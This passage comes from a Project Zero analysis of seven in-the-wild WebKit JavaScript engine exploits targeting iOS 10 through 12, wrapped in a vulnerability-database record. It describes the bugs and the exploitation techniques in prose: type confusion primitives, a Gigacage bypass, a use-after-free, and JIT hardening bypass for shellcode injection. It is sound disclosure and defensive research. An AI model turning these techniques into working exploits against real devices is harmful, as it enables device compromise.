For example the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: [aa00ee22f8f7](<https://chromium.googlesource.com/v8/v8.git/+/aa00ee22f8f7722b505fc24acf7e544dfe59ce77>) (for issue [1784](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1784>)) and [4edcc8605461](<https://chromium.googlesource.com/v8/v8.git/+/4edcc860546157cb35940663afb9af568595888f>) (for issue [1793](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1793>)). In the latter case, only a C++ test was added that tested the new behaviour without indication of how the vulnerable code could be reached.\n\n * Microsoft keeps security fixes in the open source Chakra engine private until the fixes have been shipped to users. The security fixes are then released and marked as such with a CVE identifier. See commit [7f0d390ad77d](<https://github.com/microsoft/ChakraCore/commit/7f0d390ad77d838cbb81d4586c83ec822f384ce8>) for an example of this. However, it should be noted that Chakra will soon be replaced by V8 (Chromium\u2019s JavaScript engine) in Edge.\n\n * Mozilla appears to hold back security fixes from the public repository until somewhat close to the next release. Furthermore, the commits usually do not include the JavaScript testcases used to trigger the vulnerability.\n\n \nHowever, it is worth noting that even if no JavaScript testcase is attached to the commit, it is often still possible to reconstruct a trigger (and ultimately an exploit) for the vulnerability from the code changes and/or commit message with moderate effort. \n\n\n## Exploit 1: iOS 10.0 until 10.3.2\n\nThis exploit targets CVE-2017-2505 which was originally reported by lokihardt as Project Zero issue [1137](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1137>) and fixed in WebKit HEAD with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>) on Mar 11th 2017. 
The fix was then shipped to users with the release of iOS 10.3.2 on May 15th 2017, over two months later. \n \nOf interest, the exploit trigger is almost exactly the same as in the bug report and the regression test file in the WebKit repository. This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.\n\n \n \n\n\n[](<https://1.bp.blogspot.com/-PEZlVLEefs0/XWg4BdDSxkI/AAAAAAAANUs/ELjHWgzHOZIRKSTV45E-moRivJKrAWIkACLcBGAs/s1600/JSC%2BDIFF.png>)\n\n \nThe bug causes an out-of-bounds write to the JSC heap with controlled data. The attackers exploit this by corrupting the first QWord of a controlled JSObject, changing its Structure ID (which associates runtime type information with a JSCell) to make it appear as a Uint32Array instead. This way, they essentially create a fake TypedArray which directly allows them to construct a memory read/write primitive.\n\n## Exploit 2: iOS 10.3 until 10.3.3\n\nThis exploit seems to target CVE-2017-7064 (or a variant thereof), which was originally discovered by lokihardt and reported as issue [1236](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1236>). The bug was fixed in WebKit HEAD with commit [ad6d74945b13](<https://github.com/WebKit/webkit/commit/ad6d74945b13a8ca682bffe5b4e9f1c6ce0ae692>) on Apr 18th 2017 and shipped to users with the release of iOS 10.3.3 on Jul 19th 2017, over three months later. \n \nThe bug causes uninitialized memory to be treated as the content of a JS Array. 
Through standard heap manipulation techniques it is possible to control the uninitialized data, at which point it becomes possible to construct the well-known addrof and fakeobj primitives through a type confusion between doubles and JSValues and thus gain memory read/write by constructing a fake TypedArray.\n\n## Exploit 3: likely iOS 11.0 until 11.3\n\nThis exploit targets the WebKit bug [181867](<https://bugs.webkit.org/show_bug.cgi?id=181867>) which might be CVE-2018-4122. It was fixed in WebKit HEAD on Jan 19, 2018 and presumably shipped to users with the release of iOS 11.3 on Mar 29th 2018. \n \nThe bug is a classic (by 2019 standards) [JIT side-effect modelling issue](<https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf>). It remains unclear whether the attackers knew about this bug class before it started to be widely known around the beginning of 2018. The exploit again constructs the addrof and fakeobj primitives by confusing unboxed double and JSValue arrays, then gains memory read/write by again faking a typed array object.\n\n## Exploit 4: likely iOS 11.3 until 11.4.1\n\nThis exploit targets the bug fixed in commit [b4e567d371fd](<https://github.com/WebKit/webkit/commit/b4e567d371fde84474a56810a03bf3d0719aed1e>) on May 16th 2018 and corresponding to WebKit issue [185694](<https://bugs.webkit.org/show_bug.cgi?id=185694>). Unfortunately, we were unable to determine the CVE assigned to this issue, but it seems likely that the fix shipped to users with the release of iOS 11.4.1 on Jul 9th 2018. \n \nThis is another JIT side-effect modelling bug with a similar exploit to the previous one, again constructing the fakeobj primitive to fake a JS object. However, by now the [Gigacage mitigation](<https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/>) had shipped. As such it was no longer useful to construct fake ArrayBuffers/TypedArrays. 
Instead, the exploit constructs a fake unboxed double Array and with that gains an initial, somewhat limited memory read/write primitive. It then appears to use that initial primitive to disable the Gigacage mitigation and then continues to abuse TypedArrays to perform the rest of the exploit work.\n\n## Exploit 5: iOS 11.4.1\n\nThis exploit targets CVE-2018-4438, which was first reported by lokihardt as issue [1649](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1649>). The bug was fixed with commit [8deb8bd96f4a](<https://github.com/WebKit/webkit/commit/8deb8bd96f4a27bf8bb60334c9247cc14ceab2eb>) on Oct 26th 2018 and shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nDue to the bug, it was possible to construct an Array with a Proxy prototype that wasn\u2019t expected by the engine. It is then possible to turn this bug into an incorrect side-effect modelling issue by performing effectful changes during a proxy trap triggered (unexpectedly) in JIT-compiled code. The exploit is then very similar to the previous one, first disabling the Gigacage with the limited JS Array read/write, then performing the shellcode injection with a full read/write via TypedArrays.\n\n## Exploit 6: likely iOS 12.0 until 12.1.1\n\nThis exploit targets CVE-2018-4442, which was originally discovered by lokihardt and reported as issue [1699](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1699>) and fixed in HEAD with commit [1f1683cea15c](<https://github.com/WebKit/webkit/commit/1f1683cea15c2af14710b4b73f89b55004618295>) on Oct 17th 2018. The fix then shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nIn contrast to the other bugs, this bug yields a use-after-free in the JavaScript engine. 
Similar to the PoC in the WebKit tracker, the attackers abuse the UaF by freeing the property backing storage of an object (the butterfly), then reclaim that storage with a [JSBoundFunction\u2019s m_boundArgs](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.h#L57>) array by repeatedly calling func.bind(). If that is successful, the attackers are now able to get access to an internal object, m_boundArgs, by loading a property from the freed object\u2019s butterfly. With that, it becomes possible to construct an OOB access by making the m_boundArgs array sparse, then calling the bound function. This will invoke [JSBoundFunction::boundArgsCopy](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.cpp#L216>) which assumes that m_boundArgs is dense and otherwise reads JSValues past the end of a buffer which it passes as argument to a controlled function (that was bound() previously). \n \nThis fact has been exploited in the past, which is why there is now a comment next to the definition of m_boundArgs: `// DO NOT allow this array to be mutated!`. From there, the attackers again construct the addrof and fakeobj primitives and reuse the rest of the exploit from before.\n\n## Exploit 7: iOS 12.1.1 until 12.1.3\n\nThe final exploit targets the same bug as exploited by Linus Henze here: [https://github.com/LinusHenze/WebKit-RegEx-Exploit](<https://github.com/LinusHenze/WebKit-RegEx-Exploit>), which is again a JIT side-effect modelling issue. The WebKit bugtracker id for it appears to be [191731](<https://bugs.webkit.org/show_bug.cgi?id=191731>). It is unclear whether a CVE number was assigned to it, but it could be CVE-2019-6217 which was disclosed during mobile Pwn2Own that year by Team Fluoroacetate. The bug seems to have been fixed on Nov 16th 2018 and shipped to users with the release of iOS 12.1.3 on Jan 22nd 2019. 
\n \nInstead of using WASM objects to gain memory read/write as Linus does, the attackers appear to instead have plugged the new bug into their old exploit and again create a fake JS Array to gain initial memory read/write capabilities, then continue the same way they did before.\n\n## Shellcode Execution\n\nAfter gaining memory read/write capabilities, the renderer exploit pivots to shellcode execution, which then performs the privilege escalation exploits. The way they achieve shellcode execution is the same in all exploits: by bypassing the JIT mitigations to overwrite an existing function\u2019s JIT code and then invoking that function. \n \nFor some time now (first announced by Apple at [BlackHat 2016](<https://www.blackhat.com/docs/us-16/materials/us-16-Krstic.pdf>) and then shipped with iOS 10), iOS features a JIT hardening measure that aims to make it more difficult for an attacker to write code directly into the RWX JIT region. It basically achieves that by creating a second, \u201chidden\u201d mapping of the JIT region that is writable and keeping the first mapping of the region non-writable. However, one weakness of this approach, and acknowledged in the presentation by Apple, is that there has to be a \u201cjit_memcpy\u201d function that is called to copy the generated code into the JIT region. As such, it remains viable to perform a ROP or JOP style attack to execute this function with controlled shellcode as argument. This is what the attackers do as well. This problem now appears to be somewhat mitigated on PAC enabled devices by signing the JIT code during code generation and verifying the signature later on. The exploits we found did not include a bypass for PAC enabled devices and instead bailed out if they ran on an A12 device. \n \nIn more detail, the attackers construct a JOP chain, consisting of three different gadgets that allow them to perform a function call of an arbitrary function with controlled arguments. 
To kick off the chain, they replace the native function pointer of the `escape` JS function with the first gadget of the chain. The chain then performs a call to the \u201cjit_memcpy\u201d function to overwrite the JIT code of a previously compiled function with the shellcode. Finally they replace the function pointer of `escape` one last time and point it to the shellcode inside the JIT region.\n", "modified": "2019-08-29T00:00:00", "published": "2019-08-29T00:00:00", "id": "GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC", "href": "https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html", "type": "googleprojectzero", "title": "JSC Exploits", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}